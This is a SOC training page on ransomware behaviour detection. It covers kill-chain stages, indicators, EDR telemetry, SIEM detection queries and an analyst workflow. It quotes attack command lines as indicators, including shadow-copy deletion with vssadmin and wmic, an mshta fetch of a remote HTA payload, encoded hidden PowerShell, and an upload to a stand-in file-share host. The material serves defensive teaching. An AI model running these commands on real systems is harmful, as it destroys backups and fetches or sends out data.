Home > SOC Analysis

Ransomware Behavior Detection

Ransomware behavior detection focuses on identifying the early, mid, and late-stage actions of ransomware before the encryption phase completes.
Ransomware rarely appears as a single event. It follows a predictable kill chain made up of execution, privilege escalation, lateral movement, payload deployment, and finally mass encryption.
EDR, SIEM, and SOC analysts rely on behavior detection because most modern ransomware evades signature-based antivirus and often uses fileless techniques, legitimate tools, and living-off-the-land binaries (LOLBins).

This chapter explains ransomware detection in full SOC depth, including indicators, telemetry patterns, practical queries, process trees, and investigation workflows.

Understanding Ransomware Behavior

Ransomware behavior can be grouped into stages:

  • Initial Access

  • Execution

  • Discovery & Privilege Escalation

  • Lateral Movement

  • Payload Staging

  • Data Destruction & Encryption

  • Cleanup

Detection happens by analyzing these stages in endpoint telemetry, network logs, and SIEM correlation.

Early-Stage Ransomware Indicators

These appear before encryption and are the most valuable for detection.

Suspicious Script Execution

Examples:

  • Encoded PowerShell

  • Obfuscated commands

  • WMI execution

  • Suspicious cmd or bash scripts

  • mshta execution

Pattern:

powershell.exe -nop -w hidden -enc JAB...
mshta.exe http://malicious/payload.hta

Delivery Chain Indicators

Ransomware commonly enters through:

  • Phishing → macro → PowerShell

  • Exploited RDP

  • Exploited VPN

  • Droppers using curl/wget

  • Malicious installers

Process chain example:

WINWORD.exe → powershell.exe → curl.exe → loader.exe

Tools Used During Attack

Attackers often use:

  • PowerShell

  • wmiexec

  • PsExec

  • Cobalt Strike

  • net.exe

  • nltest.exe

  • whoami

  • ipconfig /all

Reconnaissance example:

net user /domain
nltest /domain_trusts

Recon activity before encryption is a strong sign of ransomware staging.

Mid-Stage Ransomware Indicators

Attackers prepare the environment or spread laterally.

Privilege Escalation Indicators

Examples:

  • UAC bypass

  • Token manipulation

  • Credential dumping

EDR detects:

process: attacker.exe → lsass.exe (memory read)

Stopping Security Tools and Backups

Common commands:

net stop "VSS"
vssadmin delete shadows /all
wmic shadowcopy delete

These actions are highly suspicious.

Persistence Creation

Examples:

  • Scheduled tasks

  • Services

  • Registry Run keys

Pattern:

schtasks.exe /create ...
sc.exe create ...

Lateral Movement Behavior

Common patterns:

  • PsExec

  • WinRM

  • WMI

  • RDP brute force

Process tree example:

psexesvc.exe → cmd.exe → powershell.exe

This type of chain frequently precedes ransomware deployment.

Late-Stage Ransomware Indicators (Active Encryption)

These confirm ransomware is running.

Suspicious File Rewrite Patterns

High-volume file changes:

  • Many files renamed

  • Extensions changed

  • File entropy increased

EDR can detect:

process writes thousands of files in seconds

Mass Use of Crypto Libraries

Indicators:

  • OpenSSL

  • CryptoAPI

  • Custom encryption routines

Ransom Note Creation

Files like:

README.txt
RECOVER_FILES.txt
HOW_TO_DECRYPT.html

Created simultaneously across directories.

Killing Processes Before Encryption

Ransomware stops:

  • Database services

  • Backup services

  • Email servers

Example:

taskkill /IM sqlservr.exe /F

Network Indicators of Ransomware

C2 Communication Before Encryption

Outbound to:

  • .biz

  • .xyz

  • .top

  • Fast-flux IP ranges

  • Newly registered domains

Beacon pattern:

process → IP:443 every 5 seconds

Lateral Movement Traffic

  • SMB traffic to multiple systems

  • RDP/WinRM authentication bursts

Data Exfiltration (Double Extortion)

Ransomware often exfiltrates data before encryption.

Indicators:

  • Large outbound transfers

  • Uploads to cloud storage sites

  • Unusual protocols or ports

Example:

powershell.exe → https://fileshareupload.net/upload

Behavioral Patterns per Ransomware Family

LockBit Behavior

  • PsExec deployment

  • Uses PowerShell for reconnaissance

  • Stops services

  • Deletes shadow copies

Conti Behavior

  • Highly aggressive scanning

  • Cobalt Strike heavily used

  • LSASS dumping

  • Mass lateral movement

Hive Behavior

  • Drops multiple ransom notes

  • Uses encrypted communication

  • Multistage loader

Behavior >> Signature.
Behavior allows SOC to detect variants even if names change.

EDR Telemetry Useful for Ransomware Detection

Process Indicators

  • Powershell, cmd, mshta spawning unknown binaries

  • Rundll32 loading unfamiliar DLLs

  • High process execution rate

File Indicators

  • Many file modifications

  • Unexpected encryption file extensions

  • Fast rename operations

Registry Indicators

  • Autorun keys

  • Deleted backups

  • New services created

Memory Indicators

  • Injection into explorer.exe

  • Shellcode regions

  • Stagers inside legitimate processes

Network Indicators

  • Burst SMB traffic

  • Repeated 445 connections

  • Outbound C2 beacons

Detection Queries (Practical Examples)

Detect PowerShell Encoding

process_name:powershell AND commandline:*enc*

Detect Shadow Copy Deletion

process_name:vssadmin AND commandline:*delete shadows*

Detect Suspicious File Renaming

file_event.type:rename AND count > 500 in 60 seconds

Detect PsExec Lateral Movement

process_name:psexesvc.exe

Detect Outbound to Suspicious Domains

dest_domain.keyword:*.biz AND process_name:powershell

Detect Memory Injection

process.memory_protection:RWX

SOC Workflow for Ransomware Detection

Step 1 — Identify Suspicious Initial Process

Example:

powershell.exe -enc

Step 2 — Analyze Parent & Child Processes

Example:

WINWORD.exe → powershell.exe → loader.exe

Step 3 — Check for Backup Deletion

Look for:

  • vssadmin

  • wmic shadowcopy delete

Step 4 — Check for Reconnaissance

Examples:

net user
ipconfig /all
nltest

Step 5 — Check for Lateral Movement

Examples:

  • PsExec

  • WMI

  • WinRM

Step 6 — Analyze Encryption Behavior

High file write volume = near-certain encryption activity.

Step 7 — Confirm C2 Activity

Check DNS and firewall.

Step 8 — Contain

  • Isolate host

  • Kill processes

  • Block C2 IPs

  • Disable compromised accounts

Practical Ransomware Case Studies

Case 1 — Phishing → Loader → Encryption

Chain:

WINWORD.exe  
  ↳ powershell.exe  
      ↳ curl.exe  
      ↳ loader.exe  
          ↳ ransomware.exe

Indicators:

  • Shadow copy deletion

  • Many file writes

  • Ransom note creation

Case 2 — RDP Compromise → Lateral Movement → Encryption

Indicators:

  • 4625/4624 auth bursts

  • PsExec usage

  • LSASS dumping

  • Encryption across multiple hosts

Case 3 — Fileless Ransomware

Indicators:

  • Memory-only stages

  • Powershell reflective loading

  • No file writes before final stage

Memory forensics required.

Intel Dump

  • Ransomware behavior detection focuses on recognizing execution patterns before encryption.

  • Early signs include PowerShell execution, encoded commands, mshta, and downloader chains.

  • Mid-stage signs include lateral movement, privilege escalation, backup deletion, and reconnaissance.

  • Late-stage signs include mass file writes, process killing, ransom note creation, and crypto library usage.

  • SOC uses EDR telemetry, SIEM logs, and network analysis to detect each stage.

  • Combining process trees, memory forensics, and network behavior provides the strongest detection.

HOME COMMUNITY CAREERS DASHBOARD